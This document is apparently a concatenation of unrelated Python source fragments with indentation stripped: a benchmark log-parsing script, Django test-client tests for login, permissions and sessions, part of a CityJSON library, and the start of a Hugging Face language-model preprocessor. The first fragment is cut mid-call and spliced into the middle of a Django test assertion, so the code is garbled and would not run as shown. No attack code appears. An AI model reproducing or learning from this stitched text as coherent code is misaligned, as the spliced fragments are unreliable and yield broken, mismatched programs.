fsp_log_name = f'{dir_name}/fsp_log'
mean_ut, total_ut, num_worker = process_fsp_log_cpu(
fsp_log_name, cal_mean_sec_range=1.5)
cpu_ut_out = mean_ut
else:
fsp_out_df = None
return app_summary_df, fsp_out_df, cpu_ut_out
def gen_csv_for_dir(fstype, dirname, rno, cpu_ut, jobs, sz_list):
if jobs is None:
jobs = get_default_benchmarks()
else:
jobs = jobs.split(',')
if sz_list is None:
sz_list = [None]
else:
sz_list = sz_list.split(',')
fs_prefix = fstype
if fs_prefix.endswith("nj"):
fs_prefix = fs_prefix[:-2]
app_num_list = range(1, get_max_num_app() + 1)
for job in jobs:
for sz in sz_list:
cur_expr_dir = f"{dirname}/{fs_prefix}_{job}_run_{rno}"
logging.info(f'process {cur_expr_dir}')
app_out_df_list = []
for app_num in app_num_list:
if bench_has_fg_sync(job):
app_reg_str = r'log_{}_[a-z|1]+_app_{}_sync-{}$'.format(
fs_prefix, app_num, get_syncop_num())
else:
app_reg_str = r'log_{}_[a-z|1]+_app_{}$'.format(
fs_prefix, app_num)
tmp_list = get_dir_name_list_match_pattern(
cur_expr_dir, app_reg_str)
assert (len(tmp_list) == 1)
cur_app_dir = tmp_list[0]
logging.info(f'===> process app dir -- {cur_app_dir}')
date_str = f'log{get_YEAR()}'
dname_list = [
l for l in os.listdir(cur_app_dir) if date_str in l
]
assert len(dname_list) == 1
date_dir_name = dname_list[0]
assert (date_str in date_dir_name)
num_worker_list = [app_num]
for num_worker in num_worker_list:
cur_reg = r'.*_isFsp-{}_clearPc-True_pinCpu-True-numFsWk-[0-9]|10$'.format(
is_fsp(fstype), num_worker)
cur_target_expr_dir_list = get_dir_name_list_match_pattern(
'{}/{}'.format(cur_app_dir, date_dir_name), cur_reg)
cur_target_expr_dir_list = filter_listdir_dir(
job, cur_target_expr_dir_list)
if len(cur_target_expr_dir_list) != 1:
logging.warn("More than one candidate path detected!")
logging.warn(f"cur_reg: {cur_reg}")
logging.warn(
f"cur_target_expr_dir_list: {cur_target_expr_dir_list}"
)
cur_target_expr_dir_list = [
d for d in cur_target_expr_dir_list
if d.endswith(f"numFsWk-{app_num}")
]
logging.warn(f"Pick => {cur_target_expr_dir_list}")
assert (len(cur_target_expr_dir_list) == 1)
cur_target_expr_dir = cur_target_expr_dir_list[0]
app_out_df, fsp_out_df, cpu_ut_mean = process_one_expr_dir(
cur_target_expr_dir,
app_num,
num_worker,
is_fsp=True,
cpu_ut=cpu_ut,
sz=sz)
# add some fields
app_out_df['num_app'] = app_num
app_out_df['num_fs_wk'] = num_worker
app_out_df['fs_type'] = fstype
if cpu_ut:
app_out_df['cpu_ut'] = cpu_ut_mean
if fsp_out_df is not None:
fsp_out_df['num_app'] = app_num
fsp_out_df['num_fs_wk'] = num_worker
fsp_out_df['fs_type'] = fstype
app_out_df_list.append(app_out_df)
cur_df = pd.concat(app_out_df_list)
if sz is None:
csv_filename = f'{dirname}/{job}.csv'
else:
csv_filename = f'{dirname}/{job}_{sz}.csv'
cur_df.to_csv(csv_filename, index=False)
def main(args, loglevel):
logging.basicConfig(format="%(levelname)s: %(message)s", level=loglevel)
gen_csv_for_dir(args.fs, args.dir, args.rno, args.cpu_ut, args.jobs,
args.sz)
def parse_cmd_args():
parser = argparse.ArgumentParser(
description="Parse FSP microbenchmark log")
parser.add_argument('--fs',
help='file system type [fsp|ext4|ext4nj]',
required=True)
parser.add_argument('--dir', help='dir name of the logs', required=True)
parser.add_argument('--rno',
required.')
self.assertFormError(response, 'form', 'multi', 'This field is required.')
def test_form_error(self):
"POST erroneous data to a form"
post_data = {
'text': '<NAME>',
'email': 'not an email address',
'value': 37,
'single': 'b',
'multi': ('b', 'c', 'e')
}
response = self.client.post('/form_view/', post_data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "Invalid POST Template")
self.assertFormError(response, 'form', 'email', 'Enter a valid email address.')
def test_valid_form_with_template(self):
"POST valid data to a form using multiple templates"
post_data = {
'text': '<NAME>',
'email': '<EMAIL>',
'value': 37,
'single': 'b',
'multi': ('b', 'c', 'e')
}
response = self.client.post('/form_view_with_template/', post_data)
self.assertContains(response, 'POST data OK')
self.assertTemplateUsed(response, "form_view.html")
self.assertTemplateUsed(response, 'base.html')
self.assertTemplateNotUsed(response, "Valid POST Template")
def test_incomplete_data_form_with_template(self):
"POST incomplete data to a form using multiple templates"
post_data = {
'text': '<NAME>',
'value': 37
}
response = self.client.post('/form_view_with_template/', post_data)
self.assertContains(response, 'POST data has errors')
self.assertTemplateUsed(response, 'form_view.html')
self.assertTemplateUsed(response, 'base.html')
self.assertTemplateNotUsed(response, "Invalid POST Template")
self.assertFormError(response, 'form', 'email', 'This field is required.')
self.assertFormError(response, 'form', 'single', 'This field is required.')
self.assertFormError(response, 'form', 'multi', 'This field is required.')
def test_form_error_with_template(self):
"POST erroneous data to a form using multiple templates"
post_data = {
'text': '<NAME>',
'email': 'not an email address',
'value': 37,
'single': 'b',
'multi': ('b', 'c', 'e')
}
response = self.client.post('/form_view_with_template/', post_data)
self.assertContains(response, 'POST data has errors')
self.assertTemplateUsed(response, "form_view.html")
self.assertTemplateUsed(response, 'base.html')
self.assertTemplateNotUsed(response, "Invalid POST Template")
self.assertFormError(response, 'form', 'email', 'Enter a valid email address.')
def test_unknown_page(self):
"GET an invalid URL"
response = self.client.get('/unknown_view/')
# The response was a 404
self.assertEqual(response.status_code, 404)
def test_url_parameters(self):
"Make sure that URL ;-parameters are not stripped."
response = self.client.get('/unknown_view/;some-parameter')
# The path in the response includes it (ignore that it's a 404)
self.assertEqual(response.request['PATH_INFO'], '/unknown_view/;some-parameter')
def test_view_with_login(self):
"Request a page that is protected with @login_required"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
@override_settings(
INSTALLED_APPS=['django.contrib.auth'],
SESSION_ENGINE='django.contrib.sessions.backends.file',
)
def test_view_with_login_when_sessions_app_is_not_installed(self):
self.test_view_with_login()
def test_view_with_force_login(self):
"Request a page that is protected with @login_required"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_method_login(self):
"Request a page that is protected with a @login_required method"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_method_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Request a page that requires a login
response = self.client.get('/login_protected_method_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_method_force_login(self):
"Request a page that is protected with a @login_required method"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_method_view/')
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_method_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_login_and_custom_redirect(self):
"Request a page that is protected with @login_required(redirect_field_name='redirect_to')"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertRedirects(response, '/accounts/login/?redirect_to=/login_protected_view_custom_redirect/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Request a page that requires a login
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_force_login_and_custom_redirect(self):
"""
Request a page that is protected with
@login_required(redirect_field_name='redirect_to')
"""
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertRedirects(response, '/accounts/login/?redirect_to=/login_protected_view_custom_redirect/')
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_bad_login(self):
"Request a page that is protected with @login, but use bad credentials"
login = self.client.login(username='otheruser', password='<PASSWORD>')
self.assertFalse(login)
def test_view_with_inactive_login(self):
"""
An inactive user may login if the authenticate backend allows it.
"""
credentials = {'username': 'inactive', 'password': 'password'}
self.assertFalse(self.client.login(**credentials))
with self.settings(AUTHENTICATION_BACKENDS=['django.contrib.auth.backends.AllowAllUsersModelBackend']):
self.assertTrue(self.client.login(**credentials))
@override_settings(
AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend',
'django.contrib.auth.backends.AllowAllUsersModelBackend',
]
)
def test_view_with_inactive_force_login(self):
"Request a page that is protected with @login, but use an inactive login"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
self.client.force_login(self.u2, backend='django.contrib.auth.backends.AllowAllUsersModelBackend')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'inactive')
def test_logout(self):
"Request a logout after logging in"
# Log in
self.client.login(username='testclient', password='password')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
# Log out
self.client.logout()
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
def test_logout_with_force_login(self):
"Request a logout after logging in"
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
# Log out
self.client.logout()
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
@override_settings(
AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend',
'test_client.auth_backends.TestClientBackend',
],
)
def test_force_login_with_backend(self):
"""
Request a page that is protected with @login_required when using
force_login() and passing a backend.
"""
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
self.client.force_login(self.u1, backend='test_client.auth_backends.TestClientBackend')
self.assertEqual(self.u1.backend, 'test_client.auth_backends.TestClientBackend')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
@override_settings(
AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend',
'test_client.auth_backends.TestClientBackend',
],
)
def test_force_login_without_backend(self):
"""
force_login() without passing a backend and with multiple backends
configured should automatically use the first backend.
"""
self.client.force_login(self.u1)
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
self.assertEqual(self.u1.backend, 'django.contrib.auth.backends.ModelBackend')
@override_settings(AUTHENTICATION_BACKENDS=[
'test_client.auth_backends.BackendWithoutGetUserMethod',
'django.contrib.auth.backends.ModelBackend',
])
def test_force_login_with_backend_missing_get_user(self):
"""
force_login() skips auth backends without a get_user() method.
"""
self.client.force_login(self.u1)
self.assertEqual(self.u1.backend, 'django.contrib.auth.backends.ModelBackend')
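# For reference, a minimal sketch (hypothetical; the real backend lives in
# test_client.auth_backends.BackendWithoutGetUserMethod) of a backend that
# lacks get_user() and would therefore be skipped by force_login():
#
#   class BackendWithoutGetUserMethod:
#       def authenticate(self, request, username=None, password=None):
#           return None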
@override_settings(SESSION_ENGINE="django.contrib.sessions.backends.signed_cookies")
def test_logout_cookie_sessions(self):
self.test_logout()
def test_view_with_permissions(self):
"Request a page that is protected with @permission_required"
# Get the page without logging in. Should result in 302.
response = self.client.get('/permission_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Log in with wrong permissions. Should result in 302.
response = self.client.get('/permission_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_view/')
# TODO: Log in with right permissions and request the page again
def test_view_with_permissions_exception(self):
"Request a page that is protected with @permission_required but raises an exception"
# Get the page without logging in. Should result in 403.
response = self.client.get('/permission_protected_view_exception/')
self.assertEqual(response.status_code, 403)
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Log in with wrong permissions. Should result in 403.
response = self.client.get('/permission_protected_view_exception/')
self.assertEqual(response.status_code, 403)
def test_view_with_method_permissions(self):
"Request a page that is protected with a @permission_required method"
# Get the page without logging in. Should result in 302.
response = self.client.get('/permission_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_method_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Log in with wrong permissions. Should result in 302.
response = self.client.get('/permission_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_method_view/')
# TODO: Log in with right permissions and request the page again
def test_external_redirect(self):
response = self.client.get('/django_project_redirect/')
self.assertRedirects(response, 'https://www.djangoproject.com/', fetch_redirect_response=False)
def test_external_redirect_without_trailing_slash(self):
"""
Client._handle_redirects() with an empty path.
"""
response = self.client.get('/no_trailing_slash_external_redirect/', follow=True)
self.assertRedirects(response, 'https://testserver')
def test_external_redirect_with_fetch_error_msg(self):
"""
assertRedirects without fetch_redirect_response=False raises
a relevant ValueError rather than a nondescript AssertionError.
"""
response = self.client.get('/django_project_redirect/')
msg = (
"The test client is unable to fetch remote URLs (got "
"https://www.djangoproject.com/). If the host is served by Django, "
"add 'www.djangoproject.com' to ALLOWED_HOSTS. "
"Otherwise, use assertRedirects(..., fetch_redirect_response=False)."
)
with self.assertRaisesMessage(ValueError, msg):
self.assertRedirects(response, 'https://www.djangoproject.com/')
def test_session_modifying_view(self):
"Request a page that modifies the session"
# Session value isn't set initially
with self.assertRaises(KeyError):
self.client.session['tobacconist']
self.client.post('/session_view/')
# The session was modified
self.assertEqual(self.client.session['tobacconist'], 'hovercraft')
@override_settings(
INSTALLED_APPS=[],
SESSION_ENGINE='django.contrib.sessions.backends.file',
)
def test_sessions_app_is_not_installed(self):
self.test_session_modifying_view()
@override_settings(
INSTALLED_APPS=[],
SESSION_ENGINE='django.contrib.sessions.backends.nonexistent',
)
def test_session_engine_is_invalid(self):
with self.assertRaisesMessage(ImportError, 'nonexistent'):
self.test_session_modifying_view()
def test_view_with_exception(self):
"Request a page that is known to throw an error"
with self.assertRaises(KeyError):
self.client.get("/broken_view/")
def test_exc_info(self):
client = Client(raise_request_exception=False)
response = client.get("/broken_view/")
self.assertEqual(response.status_code, 500)
exc_type, exc_value, exc_traceback = response.exc_info
self.assertIs(exc_type, KeyError)
self.assertIsInstance(exc_value, KeyError)
self.assertEqual(str(exc_value), "'Oops! Looks like you wrote some bad code.'")
self.assertIsNotNone(exc_traceback)
def test_exc_info_none(self):
response = self.client.get("/get_view/")
self.assertIsNone(response.exc_info)
def test_mail_sending(self):
"Mail is redirected to a dummy outbox during test setup"
response = self.client.get('/mail_sending_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Test message')
self.assertEqual(mail.outbox[0].body, 'This is a test email')
self.assertEqual(mail.outbox[0].from_email, '<EMAIL>')
self.assertEqual(mail.outbox[0].to[0], '<EMAIL>')
self.assertEqual(mail.outbox[0].to[1], '<EMAIL>')
def test_reverse_lazy_decodes(self):
"reverse_lazy() works in the test client"
data = {'var': 'data'}
| |
import os
import re
import shutil
import json
import collections
import jsonref
from pkg_resources import resource_filename
from pkg_resources import resource_listdir
import copy
import random
from io import StringIO
from sys import platform
from click import progressbar
from datetime import datetime, date
MODULE_NUMPY_AVAILABLE = True
MODULE_PYPROJ_AVAILABLE = True
MODULE_EARCUT_AVAILABLE = True
MODULE_PANDAS_AVAILABLE = True
try:
import numpy as np
except ImportError as e:
MODULE_NUMPY_AVAILABLE = False
try:
import pyproj
except ImportError as e:
MODULE_PYPROJ_AVAILABLE = False
try:
import mapbox_earcut
except ImportError as e:
MODULE_EARCUT_AVAILABLE = False
try:
import pandas
except ImportError as e:
MODULE_PANDAS_AVAILABLE = False
from cjio import validation, subset, geom_help, convert, models
from cjio.errors import InvalidOperation
from cjio.utils import print_cmd_warning
from cjio.metadata import generate_metadata
CITYJSON_VERSIONS_SUPPORTED = ['0.6', '0.8', '0.9', '1.0']
TOPLEVEL = ('Building',
'Bridge',
'CityObjectGroup',
'CityFurniture',
'GenericCityObject',
'LandUse',
'PlantCover',
'Railway',
'Road',
'SolitaryVegetationObject',
'TINRelief',
'TransportSquare',
'Tunnel',
'WaterBody')
def load(path, transform:bool=False):
"""Load a CityJSON file for working with it though the API
:param path: Absolute path to a CityJSON file
:param transform: Apply the coordinate transformation to the vertices (if applicable)
:return: A CityJSON object
"""
with open(path, 'r') as fin:
try:
cm = CityJSON(file=fin)
except OSError as e:
raise FileNotFoundError
cm.cityobjects = dict()
if 'transform' in cm.j:
cm.transform = cm.j['transform']
else:
cm.transform = None
if transform:
do_transform = cm.transform
del cm.j['transform']
else:
do_transform = None
appearance = cm.j['appearance'] if 'appearance' in cm.j else None
for co_id, co in cm.j['CityObjects'].items():
# TODO BD: do some verification here
children = co['children'] if 'children' in co else None
parents = co['parents'] if 'parents' in co else None
attributes = co['attributes'] if 'attributes' in co else None
geometry = []
for geom in co['geometry']:
semantics = geom['semantics'] if 'semantics' in geom else None
texture = geom['texture'] if 'texture' in geom else None
geometry.append(
models.Geometry(
type=geom['type'],
lod=geom['lod'],
boundaries=geom['boundaries'],
semantics_obj=semantics,
texture_obj=texture,
appearance=appearance,
vertices=cm.j['vertices'],
transform=do_transform
)
)
cm.cityobjects[co_id] = models.CityObject(
id=co_id,
type=co['type'],
attributes=attributes,
children=children,
parents=parents,
geometry=geometry
)
return cm
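# Usage sketch for the loader above (the path is illustrative):
#   cm = load('/data/rotterdam.json', transform=True)
#   print(cm.get_version())
#   buildings = cm.get_cityobjects(type='Building')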
def save(citymodel, path: str, indent: bool = False):
"""Save a city model to a CityJSON file
:param citymodel: A CityJSON object
:param path: Absolute path to a CityJSON file
"""
cityobjects, vertex_lookup = citymodel.reference_geometry()
citymodel.add_to_j(cityobjects, vertex_lookup)
# FIXME: compression should happen here; however, the current compression does not work with immutable tuples and requires mutable lists for the points
citymodel.remove_duplicate_vertices()
citymodel.remove_orphan_vertices()
try:
with open(path, 'w') as fout:
if not indent:
json_str = json.dumps(citymodel.j, separators=(',',':'))
else:
json_str = json.dumps(citymodel.j, indent=indent)
fout.write(json_str)
except IOError as e:
raise IOError('Invalid output file: %s \n%s' % (path, e))
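# Usage sketch for the saver above (the path is illustrative); note that save()
# re-references the geometry and removes duplicate/orphan vertices before writing:
#   save(cm, '/tmp/rotterdam_out.json', indent=True)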
def reader(file, ignore_duplicate_keys=False):
return CityJSON(file=file, ignore_duplicate_keys=ignore_duplicate_keys)
def off2cj(file):
l = file.readline()
# print(l)
while (len(l) <= 1) or (l[0] == '#') or (l[:3] == 'OFF'):
l = file.readline()
# print(l)
# print ('len', len(l))
numVertices = int(l.split()[0])
numFaces = int(l.split()[1])
lstVertices = []
for i in range(numVertices):
lstVertices.append(list(map(float, file.readline().split())))
lstFaces = []
for i in range(numFaces):
lstFaces.append(list(map(int, file.readline().split()[1:])))
cm = {}
cm["type"] = "CityJSON"
cm["version"] = CITYJSON_VERSIONS_SUPPORTED[-1]
cm["CityObjects"] = {}
cm["vertices"] = []
for v in lstVertices:
cm["vertices"].append(v)
g = {'type': 'Solid'}
shell = []
for f in lstFaces:
shell.append([f])
g['boundaries'] = [shell]
g['lod'] = 1
o = {'type': 'GenericCityObject'}
o['geometry'] = [g]
cm["CityObjects"]["id-1"] = o
return CityJSON(j=cm)
def poly2cj(file):
l = file.readline()
numVertices = int(l.split()[0])
lstVertices = []
for i in range(numVertices):
lstVertices.append(list(map(float, file.readline().split()))[1:])
numFaces = int(file.readline().split()[0])
lstFaces = []
holes = []
for i in range(numFaces):
l = file.readline()
irings = int(l.split()[0]) - 1
face = []
face.append(list(map(int, file.readline().split()[1:])))
for r in range(irings):
face.append(list(map(int, file.readline().split()[1:])))
file.readline()
lstFaces.append(face)
cm = {}
cm["type"] = "CityJSON"
cm["version"] = CITYJSON_VERSIONS_SUPPORTED[-1]
cm["CityObjects"] = {}
cm["vertices"] = []
for v in lstVertices:
cm["vertices"].append(v)
g = {'type': 'Solid'}
shell = []
for f in lstFaces:
shell.append(f)
g['boundaries'] = [shell]
g['lod'] = 1
o = {'type': 'GenericCityObject'}
o['geometry'] = [g]
cm["CityObjects"]["id-1"] = o
return CityJSON(j=cm)
class CityJSON:
def __init__(self, file=None, j=None, ignore_duplicate_keys=False):
if file is not None:
self.read(file, ignore_duplicate_keys)
self.path = os.path.abspath(file.name)
self.reference_date = datetime.fromtimestamp(os.path.getmtime(file.name)).strftime('%Y-%m-%d')
self.cityobjects = {}
elif j is not None:
self.j = j
self.cityobjects = {}
self.path = None
self.reference_date = datetime.now().strftime('%Y-%m-%d')
else: #-- create an empty one
self.j = {}
self.j["type"] = "CityJSON"
self.j["version"] = CITYJSON_VERSIONS_SUPPORTED[-1]
self.j["CityObjects"] = {}
self.j["vertices"] = []
self.cityobjects = {}
self.path = None
self.reference_date = datetime.now().strftime('%Y-%m-%d')
def __repr__(self):
return self.get_info()
##-- API functions
# TODO BD: refactor this whole CityJSON class
def get_cityobjects(self, type=None, id=None):
"""Return a subset of CityObjects
:param type: CityObject type. If a list of types is given, then all objects of those types are returned.
:param id: CityObject ID. If a list of IDs is given, then all objects matching the IDs in the list are returned.
"""
if type is None and id is None:
return self.cityobjects
elif (type is not None) and (id is not None):
raise AttributeError("Please provide either 'type' or 'id'")
elif type is not None:
if isinstance(type, str):
type_list = [type.lower()]
elif isinstance(type, list) and isinstance(type[0], str):
type_list = [t.lower() for t in type]
else:
raise TypeError("'type' must be a string or list of strings")
return {i:co for i,co in self.cityobjects.items() if co.type.lower() in type_list}
elif id is not None:
if isinstance(id, str):
id_list = [id]
elif isinstance(id, list) and isinstance(id[0], str):
id_list = id
else:
raise TypeError("'id' must be a string or list of strings")
return {i:co for i,co in self.cityobjects.items() if co.id in id_list}
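# Usage sketch for the method above (IDs and types are illustrative):
#   cm.get_cityobjects(type='building')        # all Buildings (matching is case-insensitive)
#   cm.get_cityobjects(id=['id-1', 'id-2'])    # objects with the given IDs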
def set_cityobjects(self, cityobjects):
"""Creates or updates CityObjects
.. note:: If a CityObject with the same ID already exists in the model, it will be overwritten
:param cityobjects: Dictionary of CityObjects, where keys are the CityObject IDs. Same structure as returned by get_cityobjects()
"""
for co_id, co in cityobjects.items():
self.cityobjects[co_id] = co
def to_dataframe(self):
"""Converts the city model to a Pandas data frame where fields are CityObject attributes"""
if not MODULE_PANDAS_AVAILABLE:
raise ModuleNotFoundError("Modul 'pandas' is not available, please install it")
return pandas.DataFrame([co.attributes for co_id,co in self.cityobjects.items()],
index=list(self.cityobjects.keys()))
def reference_geometry(self):
"""Build a coordinate list and index the vertices for writing out to
CityJSON."""
cityobjects = dict()
vertex_lookup = dict()
vertex_idx = 0
for co_id, co in self.cityobjects.items():
j_co = co.to_json()
geometry, vertex_lookup, vertex_idx = co.build_index(vertex_lookup, vertex_idx)
j_co['geometry'] = geometry
cityobjects[co_id] = j_co
return cityobjects, vertex_lookup
def add_to_j(self, cityobjects, vertex_lookup):
self.j['vertices'] = [[vtx[0], vtx[1], vtx[2]] for vtx in vertex_lookup.keys()]
self.j['CityObjects'] = cityobjects
##-- end API functions
def get_version(self):
return self.j["version"]
def get_epsg(self):
if "metadata" not in self.j:
return None
if "crs" in self.j["metadata"] and "epsg" in self.j["metadata"]["crs"]:
return self.j["metadata"]["crs"]["epsg"]
elif "referenceSystem" in self.j["metadata"]:
s = self.j["metadata"]["referenceSystem"]
if "epsg" in s.lower():
return int(s[s.find("::")+2:])
else:
print_cmd_warning("Only EPSG codes are supported in the URN. CRS is set to undefined.")
return None
else:
return None
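# Example of the referenceSystem parsing above (value is illustrative): a metadata
# entry such as "urn:ogc:def:crs:EPSG::7415" contains "epsg", so everything after
# the "::" is returned as the integer EPSG code (7415).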
def is_empty(self):
if len(self.j["CityObjects"]) == 0:
return True
else:
return False
def is_transform(self):
return ("transform" in self.j)
def read(self, file, ignore_duplicate_keys=False):
if ignore_duplicate_keys:
self.j = json.loads(file.read())
else:
try:
self.j = json.loads(file.read(), object_pairs_hook=validation.dict_raise_on_duplicates)
except ValueError as err:
raise ValueError(err)
#-- a CityJSON file?
if "type" in self.j and self.j["type"] == "CityJSON":
pass
else:
self.j = {}
raise ValueError("Not a CityJSON file")
def fetch_schema(self, folder_schemas=None):
v = "-1"
if folder_schemas is None:
#-- fetch latest from x.y version (x.y.z)
tmp = resource_listdir(__name__, '/schemas/')
tmp.sort()
v = tmp[-1]
try:
schema = resource_filename(__name__, '/schemas/%s/cityjson.schema.json' % (v))
except:
return (False, None, '')
else:
schema = os.path.join(folder_schemas, 'cityjson.schema.json')
#-- open the schema
try:
fins = open(schema)
except:
return (False, None, '')
abs_path = os.path.abspath(os.path.dirname(schema))
#-- because Windows uses \ and not /
if platform == "darwin" or platform == "linux" or platform == "linux2":
base_uri = 'file://{}/'.format(abs_path)
else:
base_uri = 'file:///{}/'.format(abs_path.replace('\\', '/'))
js = jsonref.loads(fins.read(), jsonschema=True, base_uri=base_uri)
if v == "-1":
v = schema
return (True, js, v)
def fetch_schema_cityobjects(self, folder_schemas=None):
if folder_schemas is None:
#-- fetch proper schema from the stored ones
tmp = resource_listdir(__name__, '/schemas/')
tmp.sort()
v = tmp[-1]
try:
schema = resource_filename(__name__, '/schemas/%s/cityjson.schema.json' % (v))
except:
return (False, None)
else:
schema = os.path.join(folder_schemas, 'cityjson.schema.json')
abs_path = os.path.abspath(os.path.dirname(schema))
sco_path = abs_path + '/cityobjects.schema.json'
#-- because Windows uses \ and not /
if platform == "darwin" or platform == "linux" or platform == "linux2":
base_uri = 'file://{}/'.format(abs_path)
else:
base_uri = 'file:///{}/'.format(abs_path.replace('\\', | |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/12_text-data-language-modeling.ipynb (unless otherwise specified).
__all__ = ['LMPreprocessor', 'LMType', 'BaseLMStrategy', 'CausalLMStrategy', 'BertMLMStrategy', 'CausalLMTextInput',
'MLMTextInput', 'LMBatchTokenizeTransform']
# Cell
import os, random
from abc import ABC, abstractmethod
from enum import Enum
from datasets import Dataset
from fastcore.all import *
from fastai.imports import *
from fastai.losses import CrossEntropyLossFlat
from fastai.torch_core import *
from fastai.torch_imports import *
from transformers import (
AutoModelForCausalLM,
AutoModelForMaskedLM,
logging,
PretrainedConfig,
PreTrainedTokenizerBase,
PreTrainedModel,
BatchEncoding,
)
from .core import TextInput, BatchTokenizeTransform, Preprocessor, first_blurr_tfm
from ..utils import get_hf_objects
logging.set_verbosity_error()
# Cell
class LMPreprocessor(Preprocessor):
def __init__(
self,
# A Hugging Face tokenizer
hf_tokenizer: PreTrainedTokenizerBase,
# The number of examples to process at a time
batch_size: int = 1000,
# How big each chunk of text should be (default: hf_tokenizer.model_max_length)
chunk_size: Optional[int] = None,
# How to indicate the beginning of a new text example (default: hf_tokenizer.eos_token or hf_tokenizer.sep_token)
sep_token: Optional[str] = None,
# The attribute holding the text
text_attr: str = "text",
# The attribute that should be created if you are processing individual training and validation
# datasets into a single dataset, and will indicate to which dataset each example belongs
is_valid_attr: Optional[str] = "is_valid",
# Tokenization kwargs that will be applied when calling the tokenizer
tok_kwargs: dict = {},
):
tok_kwargs = {**tok_kwargs, "truncation": False, "return_offsets_mapping": True}
super().__init__(hf_tokenizer, batch_size, text_attr, None, is_valid_attr, tok_kwargs)
self.chunk_size = chunk_size or hf_tokenizer.model_max_length
self.sep_token = sep_token or hf_tokenizer.eos_token or hf_tokenizer.sep_token
def process_df(self, training_df: pd.DataFrame, validation_df: Optional[pd.DataFrame] = None):
# process df in mini-batches
final_train_df = pd.DataFrame()
for g, batch_df in training_df.groupby(np.arange(len(training_df)) // self.batch_size):
final_train_df = final_train_df.append(self._process_df_batch(batch_df))
final_train_df.reset_index(drop=True, inplace=True)
final_val_df = pd.DataFrame() if validation_df is not None else None
if final_val_df is not None:
for g, batch_df in validation_df.groupby(np.arange(len(validation_df)) // self.batch_size):
final_val_df = final_val_df.append(self._process_df_batch(batch_df))
final_val_df.reset_index(drop=True, inplace=True)
final_df = super().process_df(final_train_df, final_val_df)
return final_df
def process_hf_dataset(self, training_ds: Dataset, validation_ds: Optional[Dataset] = None):
ds = super().process_hf_dataset(training_ds, validation_ds)
return Dataset.from_pandas(self.process_df(pd.DataFrame(ds)))
# ----- utility methods -----
def _process_df_batch(self, batch_df):
batch_df.reset_index(drop=True, inplace=True)
# concatenate our texts
concat_txts = {self.text_attr: f" {self.sep_token} ".join(batch_df[self.text_attr].values.tolist())}
inputs = self._tokenize_function(concat_txts)
# compute the length of our concatenated texts
n_total_toks = len(inputs["input_ids"])
# need to modify chunk_size to include the number of special tokens added
max_chunk_size = self.chunk_size - self.hf_tokenizer.num_special_tokens_to_add() - 1
